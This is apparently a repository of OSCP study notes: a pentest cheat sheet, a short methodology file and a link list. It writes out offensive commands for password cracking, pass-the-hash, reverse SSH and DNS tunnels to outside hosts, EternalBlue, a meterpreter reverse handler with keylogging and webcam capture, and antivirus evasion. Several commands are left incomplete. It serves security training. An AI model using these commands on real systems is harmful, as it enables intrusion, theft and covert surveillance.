2085 | 1400 | SHA-256 | Raw Hash
2086 | 1700 | SHA-512 | Raw Hash
2087 | ```
2088 |
2089 | Create a .hash file with all the hashes you want to crack
2090 | puthasheshere.hash:
2091 | ```
2092 | $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/
2093 | ```
2094 |
2095 | Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:
2096 |
2097 | `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`
2098 |
2099 | Wordpress sample hash: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/
2100 |
2101 | Wordpress clear text: test
2102 |
2103 | Hashcat example cracking Wordpress passwords using rockyou:
2104 |
2105 | `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`
2106 |
2107 | - Sample Hashes
2108 | [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)
2109 |
2110 | - Identify Hashes
2111 |
2112 | `hash-identifier`
2113 |
2114 | - To crack linux hashes you must first unshadow them:
2115 |
2116 | `unshadow passwd-file.txt shadow-file.txt `
2117 | `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`
2118 |
2119 | - John the Ripper - Password Hash Cracking
2120 |
2121 | - `john $ip.pwdump`
2122 |
2123 | - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`
2124 |
2125 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`
2126 |
2127 | - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`
2128 |
2129 | - JTR forced descrypt cracking with wordlist
2130 |
2131 | `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`
2132 |
2133 | - JTR forced descrypt brute force cracking
2134 |
2135 | `john --format=descrypt hash --show`
2136 |
2137 | - Passing the Hash in Windows
2138 |
2139 | - Use Metasploit to exploit one of the SMB servers in the labs.
2140 | Dump the password hashes and attempt a pass-the-hash attack
2141 | against another system:
2142 |
2143 | `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `
2144 |
2145 | `pth-winexe -U administrator //$ip cmd`
2146 |
2147 | Networking, Pivoting and Tunneling
2148 | ================================================================================================================================
2149 |
2150 | - Port Forwarding - accept traffic on a given IP address and port and
2151 | redirect it to a different IP address and port
2152 |
2153 | - `apt-get install rinetd`
2154 |
2155 | - `cat /etc/rinetd.conf `
2156 | `\# bindadress bindport connectaddress connectport `
2157 | `w.x.y.z 53 a.b.c.d 80`
2158 |
2159 | - SSH Local Port Forwarding: supports bi-directional communication
2160 | channels
2161 |
2162 | - `ssh -L ::`
2164 |
2165 | - SSH Remote Port Forwarding: Suitable for popping a remote shell on
2166 | an internal non routable network
2167 |
2168 | - `ssh -R ::`
2170 |
2171 | - SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
2172 | attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
2173 | network on ANY PORT
2174 |
2175 | - `ssh -D -p
2176 | `
2177 |
2178 | - Proxychains - Perform nmap scan within a DMZ from an external
2179 | computer
2180 |
2181 | - Create reverse SSH tunnel from Popped machine on :2222
2182 |
2183 | `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`
2184 | `ssh -f -N -R 2222::22 root@`
2185 |
2186 | - Create a Dynamic application-level port forward on 8080 thru
2187 | 2222
2188 |
2189 | `ssh -f -N -D :8080 -p 2222 hax0r@`
2190 |
2191 | - Leverage the SSH SOCKS server to perform Nmap scan on network
2192 | using proxy chains
2193 |
2194 | `proxychains nmap --top-ports=20 -sT -Pn $ip/24`
2195 |
2196 | - HTTP Tunneling
2197 |
2198 | `nc -vvn $ip 8888`
2199 |
2200 | - Traffic Encapsulation - Bypassing deep packet inspection
2201 |
2202 | - http tunnel
2203 | On server side:
2204 | `sudo hts -F : 80 `
2205 | On client side:
2206 | `sudo htc -P -F :80 stunnel`
2207 |
2208 | - Tunnel Remote Desktop (RDP) from a Popped Windows machine to your
2209 | network
2210 |
2211 | - Tunnel on port 22
2212 |
2213 | `plink -l root -pw pass -R 3389::3389 `
2214 |
2215 | - Port 22 blocked? Try port 80? or 443?
2216 |
2217 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P80`
2218 |
2219 | - Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel
2220 | (bypass deep packet inspection)
2221 |
2222 | - Windows machine add required firewall rules without prompting the user
2223 |
2224 | - `netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes`
2225 |
2226 | - `netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000`
2227 |
2228 | - `netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080`
2229 |
2230 | - `netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079`
2231 |
2232 | - Start the http tunnel client
2233 |
2234 | `httptunnel_client.exe`
2235 |
2236 | - Create HTTP reverse shell by connecting to localhost port 3000
2237 |
2238 | `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P 3000`
2239 |
2240 | - VLAN Hopping
2241 |
2242 | - `git clone https://github.com/nccgroup/vlan-hopping.git
2243 | chmod 700 frogger.sh
2244 | ./frogger.sh`
2245 |
2246 |
2247 | - VPN Hacking
2248 |
2249 | - Identify VPN servers:
2250 | `./udp-protocol-scanner.pl -p ike $ip`
2251 |
2252 | - Scan a range for VPN servers:
2253 | `./udp-protocol-scanner.pl -p ike -f ip.txt`
2254 |
2255 | - Use IKEForce to enumerate or dictionary attack VPN servers:
2256 |
2257 | `pip install pyip`
2258 |
2259 | `git clone https://github.com/SpiderLabs/ikeforce.git `
2260 |
2261 | Perform IKE VPN enumeration with IKEForce:
2262 |
2263 | `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic `
2264 |
2265 | Bruteforce IKE VPN using IKEForce:
2266 |
2267 | `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `
2268 | Use ike-scan to capture the PSK hash:
2269 |
2270 | `ike-scan
2271 | ike-scan TARGET-IP
2272 | ike-scan -A TARGET-IP
2273 | ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
2274 | ike-scan –M –A –n example\_group -P hash-file.txt TARGET-IP `
2275 | Use psk-crack to crack the PSK hash
2276 |
2277 | `psk-crack hash-file.txt
2278 | pskcrack
2279 | psk-crack -b 5 TARGET-IPkey
2280 | psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
2281 | psk-crack -d /path/to/dictionary-file TARGET-IP-key`
2282 |
2283 | - PPTP Hacking
2284 |
2285 | - Identifying PPTP, it listens on TCP: 1723
2286 | NMAP PPTP Fingerprint:
2287 |
2288 | `nmap –Pn -sV -p 1723 TARGET(S) `
2289 | PPTP Dictionary Attack
2290 |
2291 | `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`
2292 |
2293 | - Port Forwarding/Redirection
2294 |
2295 | - PuTTY Link tunnel - SSH Tunneling
2296 |
2297 | - Forward remote port to local address:
2298 |
2299 | `plink.exe -P 22 -l root -pw "1337" -R 445::445 `
2300 |
2301 | - SSH Pivoting
2302 |
2303 | - SSH pivoting from one network to another:
2304 |
2305 | `ssh -D :1010 -p 22 user@`
2306 |
2307 | - DNS Tunneling
2308 |
2309 | - dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.
2310 |
2311 | - Attacking Machine Installation:
2312 |
2313 | `apt-get update
2314 | apt-get -y install ruby-dev git make g++
2315 | gem install bundler
2316 | git clone https://github.com/iagox86/dnscat2.git
2317 | cd dnscat2/server
2318 | bundle install`
2319 |
2320 | - Run dnscat2:
2321 |
2322 | `ruby ./dnscat2.rb
2323 | dnscat2> New session established: 1422
2324 | dnscat2> session -i 1422`
2325 |
2326 | - Target Machine:
2327 | https://downloads.skullsecurity.org/dnscat2/
2328 | https://github.com/lukebaggett/dnscat2-powershell/
2329 |
2330 | `dnscat --host `
2331 |
2332 | The Metasploit Framework
2333 | ======================================================================================================================
2334 |
2335 | - See [*Metasploit Unleashed
2336 | Course*](https://www.offensive-security.com/metasploit-unleashed/)
2337 | in the Essentials
2338 |
2339 | - Search for exploits using Metasploit GitHub framework source code:
2340 | [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework)
2341 | Translate them for use on OSCP LAB or EXAM.
2342 |
2343 | - Metasploit
2344 |
2345 | - MetaSploit requires Postfresql
2346 |
2347 | `systemctl start postgresql`
2348 |
2349 | - To enable Postgresql on startup
2350 |
2351 | `systemctl enable postgresql`
2352 |
2353 | - MSF Syntax
2354 |
2355 | - Start metasploit
2356 |
2357 | `msfconsole `
2358 |
2359 | `msfconsole -q`
2360 |
2361 | - Show help for command
2362 |
2363 | `show -h`
2364 |
2365 | - Show Auxiliary modules
2366 |
2367 | `show auxiliary`
2368 |
2369 | - Use a module
2370 |
2371 | `use auxiliary/scanner/snmp/snmp_enum
2372 | use auxiliary/scanner/http/webdav_scanner
2373 | use auxiliary/scanner/smb/smb_version
2374 | use auxiliary/scanner/ftp/ftp_login
2375 | use exploit/windows/pop3/seattlelab_pass`
2376 |
2377 | - Show the basic information for a module
2378 |
2379 | `info`
2380 |
2381 | - Show the configuration parameters for a module
2382 |
2383 | `show options`
2384 |
2385 | - Set options for a module
2386 |
2387 | `set RHOSTS 192.168.1.1-254
2388 | set THREADS 10`
2389 |
2390 | - Run the module
2391 |
2392 | `run`
2393 |
2394 | - Execute an Exploit
2395 |
2396 | `exploit`
2397 |
2398 | - Search for a module
2399 |
2400 | `search type:auxiliary login`
2401 |
2402 | - Metasploit Database Access
2403 |
2404 | - Show all hosts discovered in the MSF database
2405 |
2406 | `hosts`
2407 |
2408 | - Scan for hosts and store them in the MSF database
2409 |
2410 | `db_nmap`
2411 |
2412 | - Search machines for specific ports in MSF database
2413 |
2414 | `services -p 443`
2415 |
2416 | - Leverage MSF database to scan SMB ports (auto-completed rhosts)
2417 |
2418 | `services -p 443 --rhosts`
2419 |
2420 | - Staged and Non-staged
2421 |
2422 | - Non-staged payload - is a payload that is sent in its entirety in one go
2423 |
2424 | - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus
2425 |
2426 | - MS 17-010 - EternalBlue
2427 |
2428 | - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video:
2429 | https://www.youtube.com/watch?v=4OHLor9VaRI
2430 |
2431 |
2432 | 1. First step is to configure the Kali to work with wine 32bit
2433 |
2434 | `dpkg --add-architecture i386 && apt-get update && apt-get install wine32
2435 | rm -r ~/.wine
2436 | wine cmd.exe
2437 | exit`
2438 |
2439 | 2. Download the exploit repostory
2440 | https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
2441 |
2442 | 3. Move the exploit to /usr /share /metasploit-framework /modules /exploits /windows /smb
2443 |
2444 | 4. Start metasploit console
2445 |
2446 |
2447 | I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.
2448 |
2449 |
2450 | `use exploit/windows/smb/eternalblue_doublepulsar
2451 | msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10
2452 | RHOST => 10.11.1.73
2453 | msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe
2454 | PROCESSINJECT => spoolsv.exe
2455 | msf exploit(eternalblue_doublepulsar) > run`
2456 |
2457 |
2458 |
2459 | - Experimenting with Meterpreter
2460 |
2461 | - Get system information from Meterpreter Shell
2462 |
2463 | `sysinfo`
2464 |
2465 | - Get user id from Meterpreter Shell
2466 |
2467 | `getuid`
2468 |
2469 | - Search for a file
2470 |
2471 | `search -f *pass*.txt`
2472 |
2473 | - Upload a file
2474 |
2475 | `upload /usr/share/windows-binaries/nc.exe c:\\Users\\Offsec`
2476 |
2477 | - Download a file
2478 |
2479 | `download c:\\Windows\\system32\\calc.exe /tmp/calc.exe`
2480 |
2481 | - Invoke a command shell from Meterpreter Shell
2482 |
2483 | `shell`
2484 |
2485 | - Exit the meterpreter shell
2486 |
2487 | `exit`
2488 |
2489 | - Metasploit Exploit Multi Handler
2490 |
2491 | - multi/handler to accept an incoming reverse\_https\_meterpreter
2492 |
2493 | `payload
2494 | use exploit/multi/handler
2495 | set PAYLOAD windows/meterpreter/reverse_https
2496 | set LHOST $ip
2497 | set LPORT 443
2498 | exploit
2499 | [*] Started HTTPS reverse handler on https://$ip:443/`
2500 |
2501 | - Building Your Own MSF Module
2502 |
2503 | - `mkdir -p ~/.msf4/modules/exploits/linux/misc
2504 | cd ~/.msf4/modules/exploits/linux/misc
2505 | cp
2506 | /usr/share/metasploitframework/modules/exploits/linux/misc/gld\_postfix.rb
2507 | ./crossfire.rb
2508 | nano crossfire.rb`
2509 |
2510 | - Post Exploitation with Metasploit - (available options depend on OS and Meterpreter Cababilities)
2511 |
2512 | - `download` Download a file or directory
2513 | `upload` Upload a file or directory
2514 | `portfwd` Forward a local port to a remote service
2515 | `route` View and modify the routing table
2516 | `keyscan_start` Start capturing keystrokes
2517 | `keyscan_stop` Stop capturing keystrokes
2518 | `screenshot` Grab a screenshot of the interactive desktop
2519 | `record_mic` Record audio from the default microphone for X seconds
2520 | `webcam_snap` Take a snapshot from the specified webcam
2521 | `getsystem` Attempt to elevate your privilege to that of local system.
2522 | `hashdump` Dumps the contents of the SAM database
2523 |
2524 | - Meterpreter Post Exploitation Features
2525 |
2526 | - Create a Meterpreter background session
2527 |
2528 | `background`
2529 |
2530 | Bypassing Antivirus Software
2531 | ===========================================================================================================================
2532 |
2533 | - Crypting Known Malware with Software Protectors
2534 |
2535 | - One such open source crypter, called Hyperion
2536 |
2537 | `cp /usr/share/windows-binaries/Hyperion-1.0.zip
2538 | unzip Hyperion-1.0.zip
2539 | cd Hyperion-1.0/
2540 | i686-w64-mingw32-g++ Src/Crypter/*.cpp -o hyperion.exe
2541 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libgcc_s_sjlj-1.dll .
2542 | cp -p /usr/lib/gcc/i686-w64-mingw32/5.3-win32/libstdc++-6.dll .
2543 | wine hyperion.exe ../backdoor.exe ../crypted.exe`
2544 |
2545 |
2546 | OSCP Course Review
2547 | ================================================================================================================
2548 |
2549 | - Offensive Security’s PWB and OSCP — My Experience
2550 | [*http://www.securitysift.com/offsec-pwb-oscp/*](http://www.securitysift.com/offsec-pwb-oscp/)
2551 |
2552 | - OSCP Journey
2553 | [*https://scriptkidd1e.wordpress.com/oscp-journey/*](https://scriptkidd1e.wordpress.com/oscp-journey/)
2554 |
2555 | - Down with OSCP
2556 | [*http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/*](http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/)
2557 |
2558 | - Jolly Frogs - Tech Exams (Very thorough)
2559 |
2560 | [*http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html*](http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html)
2561 |
2562 | OSCP Inspired VMs and Walkthroughs
2563 | ================================================================================================================================
2564 |
2565 | - [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2566 | [*https://www.root-me.org/*](https://www.root-me.org/)
2567 |
2568 | - Walk through of Tr0ll-1 - Inspired by on the Trolling found in the
2569 | OSCP exam
2570 | [*https://highon.coffee/blog/tr0ll-1-walkthrough/*](https://highon.coffee/blog/tr0ll-1-walkthrough/)
2571 | Another walk through for Tr0ll-1
2572 | [*https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/*](https://null-byte.wonderhowto.com/how-to/use-nmap-7-discover-vulnerabilities-launch-dos-attacks-and-more-0168788/)
2573 | Taming the troll - walkthrough
2574 | [*https://leonjza.github.io/blog/2014/08/15/taming-the-troll/*](https://leonjza.github.io/blog/2014/08/15/taming-the-troll/)
2575 | Troll download on Vuln Hub
2576 | [*https://www.vulnhub.com/entry/tr0ll-1,100/*](https://www.vulnhub.com/entry/tr0ll-1,100/)
2577 |
2578 | - Sickos - Walkthrough:
2579 | [*https://highon.coffee/blog/sickos-1-walkthrough/*](https://highon.coffee/blog/sickos-1-walkthrough/)
2580 | Sickos - Inspired by Labs in OSCP
2581 | [*https://www.vulnhub.com/series/*](https://www.vulnhub.com/series/sickos,70/)[sickos](https://www.vulnhub.com/series/sickos,70/)[*,70/*](https://www.vulnhub.com/series/sickos,70/)
2582 |
2583 | - Lord of the Root Walk Through
2584 | [*https://highon.coffee/blog/lord-of-the-root-walkthrough/*](https://highon.coffee/blog/lord-of-the-root-walkthrough/)
2585 | Lord Of The Root: 1.0.1 - Inspired by OSCP
2586 | [*https://www.vulnhub.com/series/lord-of-the-root,67/*](https://www.vulnhub.com/series/lord-of-the-root,67/)
2587 |
2588 | - Tr0ll-2 Walk Through
2589 | [*https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/*](https://leonjza.github.io/blog/2014/10/10/another-troll-tamed-solving-troll-2/)
2590 | Tr0ll-2
2591 | [*https://www.vulnhub.com/entry/tr0ll-2,107/*](https://www.vulnhub.com/entry/tr0ll-2,107/)
2592 |
2593 | Cheat Sheets
2594 | ==========================================================================================================
2595 |
2596 | - Penetration Tools Cheat Sheet
2597 | [*https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/*](https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/)
2598 |
2599 | - Pen Testing Bookmarks
2600 | [*https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md*](https://github.com/kurobeats/pentest-bookmarks/blob/master/BookmarksList.md)
2601 |
2602 | - OSCP Cheatsheets
2603 | [*https://github.com/slyth11907/Cheatsheets*](https://github.com/slyth11907/Cheatsheets)
2604 |
2605 | - CEH Cheatsheet
2606 | [*https://scadahacker.com/library/Documents/Cheat\_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf*](https://scadahacker.com/library/Documents/Cheat_Sheets/Hacking%20-%20CEH%20Cheat%20Sheet%20Exercises.pdf)
2607 |
2608 | - Net Bios Scan Cheat Sheet
2609 | [*https://highon.coffee/blog/nbtscan-cheat-sheet/*](https://highon.coffee/blog/nbtscan-cheat-sheet/)
2610 |
2611 | - Reverse Shell Cheat Sheet
2612 | [*https://highon.coffee/blog/reverse-shell-cheat-sheet/*](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
2613 |
2614 | - NMap Cheat Sheet
2615 | [*https://highon.coffee/blog/nmap-cheat-sheet/*](https://highon.coffee/blog/nmap-cheat-sheet/)
2616 |
2617 | - Linux Commands Cheat Sheet
2618 | [*https://highon.coffee/blog/linux-commands-cheat-sheet/*](https://highon.coffee/blog/linux-commands-cheat-sheet/)
2619 |
2620 | - Security Hardening CentO 7
2621 | [*https://highon.coffee/blog/security-harden-centos-7/*](https://highon.coffee/blog/security-harden-centos-7/)
2622 |
2623 | - MetaSploit Cheatsheet
2624 | [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
2625 |
2626 | - Google Hacking Database:
2627 | [*https://www.exploit-db.com/google-hacking-database/*](https://www.exploit-db.com/google-hacking-database/)
2628 |
2629 | - Windows Assembly Language Mega Primer
2630 | [*http://www.securitytube.net/groups?operation=view&groupId=6*](http://www.securitytube.net/groups?operation=view&groupId=6)
2631 |
2632 | - Linux Assembly Language Mega Primer
2633 | [*http://www.securitytube.net/groups?operation=view&groupId=5*](http://www.securitytube.net/groups?operation=view&groupId=5)
2634 |
2635 | - Metasploit Cheat Sheet
2636 | [*https://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
2637 |
2638 | - A bit dated but most is still relevant
2639 |
2640 | [*http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html*](http://hackingandsecurity.blogspot.com/2016/04/oscp-related-notes.html)
2641 |
2642 | - NetCat
2643 |
2644 | - [*http://www.sans.org/security-resources/sec560/netcat\_cheat\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf)
2645 |
2646 | - [*http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf*](http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf)
2647 |
2648 | - [*http://sbdtools.googlecode.com/files/hping3\_cheatsheet\_v1.0-ENG.pdf*](http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf)
2649 |
2650 | - [*http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf*](http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf)
2651 |
2652 | - [*http://www.sans.org/security-resources/sec560/misc\_tools\_sheet\_v1.pdf*](http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf)
2653 |
2654 | - [*http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html*](http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html)
2655 |
2656 | - [*http://h.ackack.net/cheat-sheets/netcat*](http://h.ackack.net/cheat-sheets/netcat)
2657 |
2658 | Essentials
2659 | ========================================================================================================
2660 |
2661 | - Exploit-db
2662 | [*https://www.exploit-db.com/*](https://www.exploit-db.com/)
2663 |
2664 | - SecurityFocus - Vulnerability database
2665 | [*http://www.securityfocus.com/*](http://www.securityfocus.com/)
2666 |
2667 | - Vuln Hub - Vulnerable by design
2668 | [*https://www.vulnhub.com/*](https://www.vulnhub.com/)
2669 |
2670 | - Exploit Exercises
2671 | [*https://exploit-exercises.com/*](https://exploit-exercises.com/)
2672 |
2673 | - SecLists - collection of multiple types of lists used during
2674 | security assessments. List types include usernames, passwords, URLs,
2675 | sensitive data grep strings, fuzzing payloads
2676 | [*https://github.com/danielmiessler/SecLists*](https://github.com/danielmiessler/SecLists)
2677 |
2678 | - Security Tube
2679 | [*http://www.securitytube.net/*](http://www.securitytube.net/)
2680 |
2681 | - Metasploit Unleashed - free course on how to use Metasploit
2682 | [*https://www.offensive-security.com/metasploit-unleashed*](https://www.offensive-security.com/metasploit-unleashed/)*/*
2683 |
2684 | - 0Day Security Enumeration Guide
2685 | [*http://www.0daysecurity.com/penetration-testing/enumeration.html*](http://www.0daysecurity.com/penetration-testing/enumeration.html)
2686 |
2687 | - Github IO Book - Pen Testing Methodology
2688 | [*https://monkeysm8.gitbooks.io/pentesting-methodology/*](https://monkeysm8.gitbooks.io/pentesting-methodology/)
2689 |
2690 | Windows Privledge Escalation
2691 | ========================================================================================================
2692 |
2693 | - Fuzzy Security
2694 | [*http://www.fuzzysecurity.com/tutorials/16.html*](http://www.fuzzysecurity.com/tutorials/16.html)
2695 |
2696 | - accesschk.exe
2697 | https://technet.microsoft.com/en-us/sysinternals/bb664922
2698 |
2699 | - Windows Priv Escalation For Pen Testers
2700 | https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
2701 |
2702 | - Elevating Privileges to Admin and Further
2703 | https://hackmag.com/security/elevating-privileges-to-administrative-and-further/
2704 |
2705 | - Transfer files to windows machines
2706 | https://blog.netspi.com/15-ways-to-download-a-file/
2707 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/Process.md:
--------------------------------------------------------------------------------
1 | # OSCP Methodology
2 |
3 | ## Vaguely Important Things (Higher Abstraction PoV)
4 | - Try Harder = Enumerate Harder
5 | - Nmap -> Gobuster / Wfuzz -> Nikto -> Searchsploit
6 | - [Useful OSCP Notes](https://github.com/dostoevskylabs/dostoevsky-pentest-notes)
7 |
8 | ## Note taking / Reporting
9 |
10 | [OffSec's Reporting Template](https://www.offensive-security.com/pwk-online/PWKv1-REPORT.doc)
11 |
12 | - Read up on what specific requirements there are for extra points
13 | - Over the next week of study, refine note-taking & screenshotting to make life easier
14 | - Use OneNote, seems to be recommended a bunch
15 |
16 |
17 | ## Things to do that will be *very* useful
18 | - Compiling exploits for various operating systems so I don't need to later down the line... github might be best here for finding & checking these.
19 | - Making the most of the labs whilst they are available. Try to get through as much as possible, because it's the only limited resource.
20 | - Look at Penetration Testing book for good methodology
21 |
22 |
23 |
24 | ## Initial Enumeration
25 |
26 | ### Port scanning:
27 | nmap -F $TARGET
28 |
29 | {Check web services/anything obvious)
30 |
31 | nmap -p- $TARGET -oA fullPortSweep
32 |
33 | nmap -p -A $TARGET -oA scriptsVersionsOS
34 |
35 | nmap -p --script=vuln $TARGET -oA vulnScripts
36 |
37 | nmap -p- -sU Full UDP Scan -oA UDPSweep
38 |
39 |
--------------------------------------------------------------------------------
/InfoSec-Learning-Materials/README.md:
--------------------------------------------------------------------------------
1 | # Infosec Learning Materials
2 |
3 | Resource for developing infosec skills for upcoming OSCP exam
4 |
5 | ## OSCP Rules & Documents
6 |
7 | [Exam Guide](https://support.offensive-security.com/#!oscp-exam-guide.md)
8 |
9 | ## Practice
10 |
11 | [Exploit Exercises](https://exploit-exercises.com/)
12 |
13 | [OverTheWire - Wargames](https://overthewire.org/wargames/)
14 |
15 | [Hack This Site](https://www.hackthissite.org/)
16 |
17 | [Flare-On](http://www.flare-on.com/)
18 |
19 | [Reverse Engineering Challenges](https://challenges.re/)
20 |
21 | [CTF Learn](https://ctflearn.com/)
22 |
23 | [Mystery Twister - Crypto Challenges](https://www.mysterytwisterc3.org/en/)
24 |
25 | ## Buffer Overflows
26 |
27 | [Buffer Overflow Practice](https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/)
28 |
29 | [Fuzzy Security - Windows Exploit Development](http://www.fuzzysecurity.com/tutorials.html)
30 |
31 | [dostackbufferoverflowgood - easy to read](https://github.com/justinsteven/dostackbufferoverflowgood)
32 |
33 | [Exploit Exercises](https://exploit-exercises.com/)
34 |
35 | [Corelan's exploit writing tutorial](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/)
36 |
37 | [Live Overflow's Binary Hacking Videos](https://www.youtube.com/watch?v=iyAyN3GFM7A&list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)
38 |
39 | [Introduction to 32-bit Windows Buffer Overflows](https://www.veteransec.com/blog/introduction-to-32-bit-windows-buffer-overflows)
40 |
41 | [Getting Started with x86 Linux Buffer Overflows](https://scriptdotsh.com/index.php/2018/05/14/getting-started-with-linux-buffer-overflows-part-1-introduction/)
42 |
43 | ## Binary Exploitation
44 |
45 | [Binary Exploitation ELI5](https://medium.com/@danielabloom/binary-exploitation-eli5-part-1-9bc23855a3d8)
46 |
47 | [Exploit Development Roadmap](https://www.reddit.com/r/ExploitDev/comments/7zdrzc/exploit_development_learning_roadmap/)
48 |
49 | ## General OSCP Guides/Resources
50 |
51 | [Real Useful OSCP Journey](https://infosecuritygeek.com/my-oscp-journey/)
52 |
53 | [Tulpa PWK Prep](https://tulpa-security.com/2016/09/19/prep-guide-for-offsecs-pwk/)
54 |
55 | [Tulpa PWK Prep PDF](https://tulpasecurity.files.wordpress.com/2016/09/tulpa-pwk-prep-guide1.pdf)
56 |
57 | [Abatchy's Guide (apparently pretty good!)](https://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob.html)
58 |
59 | [Real good guide with many an info](https://www.securitysift.com/offsec-pwb-oscp/)
60 |
61 | ## Infosec News / Publications
62 |
63 | [Security Affairs](http://securityaffairs.co/wordpress/)
64 |
65 | [The Register](https://www.theregister.co.uk/security/)
66 |
67 | [Risky Biz](https://risky.biz/)
68 |
69 | [Vectra](https://blog.vectra.ai/blog)
70 |
71 | ## Infosec Blogs
72 |
73 | [Nii Consulting](https://niiconsulting.com/checkmate/)
74 |
75 | [Guido Vranken](https://guidovranken.com)
76 |
77 | [SecJuice](https://medium.com/secjuice/)
78 |
79 | ## OSCP Reviews/Writeups
80 |
81 | ~~[Process Focused Review](https://occultsec.com/2018/04/27/the-oscp-a-process-focused-review/)~~
82 |
83 | ~~[Full marks in 90 days](https://coffeegist.com/security/my-oscp-experience/)~~
84 |
85 | [Zero to OSCP in 292 days (still somewhat relevant)](https://blog.mallardlabs.com/zero-to-oscp-in-292-days-or-how-i-accidentally-the-whole-thing-part-2/)
86 |
87 | [31-Day OSCP - with some useful info](https://scriptdotsh.com/index.php/2018/04/17/31-days-of-oscp-experience/)
88 |
89 | ## Fuzzing
90 |
91 | [Fuzzing Adobe Reader](https://kciredor.com/fuzzing-adobe-reader-for-exploitable-vulns-fun-not-profit.html)
92 |
93 | ## Reverse Engineering
94 |
95 | [Reverse Engineering x64 for Beginners](http://niiconsulting.com/checkmate/2018/04/reverse-engineering-x64-for-beginners-linux/)
96 |
97 | [Backdoor - Reverse Engineering CTFs](https://backdoor.sdslabs.co/)
98 |
99 | [Begin Reverse Engineering: workshop](https://www.begin.re/)
100 |
101 | ## Pivoting
102 |
103 | [The Red Teamer's Guide to Pivoting](https://artkond.com/2017/03/23/pivoting-guide/)
104 |
105 | ## Github Disovered OSCP Tools/Resources
106 |
107 | [Lots of OSCP Materials](https://gist.github.com/natesubra/5117959c660296e12d3ac5df491da395)
108 |
109 | [Collection of things made during OSCP journey](https://github.com/ihack4falafel/OSCP)
110 |
111 | [Notes from Study Plan](https://github.com/ferreirasc/oscp)
112 |
113 | [Resource List - not overly thorough](https://github.com/secman-pl/oscp)
114 |
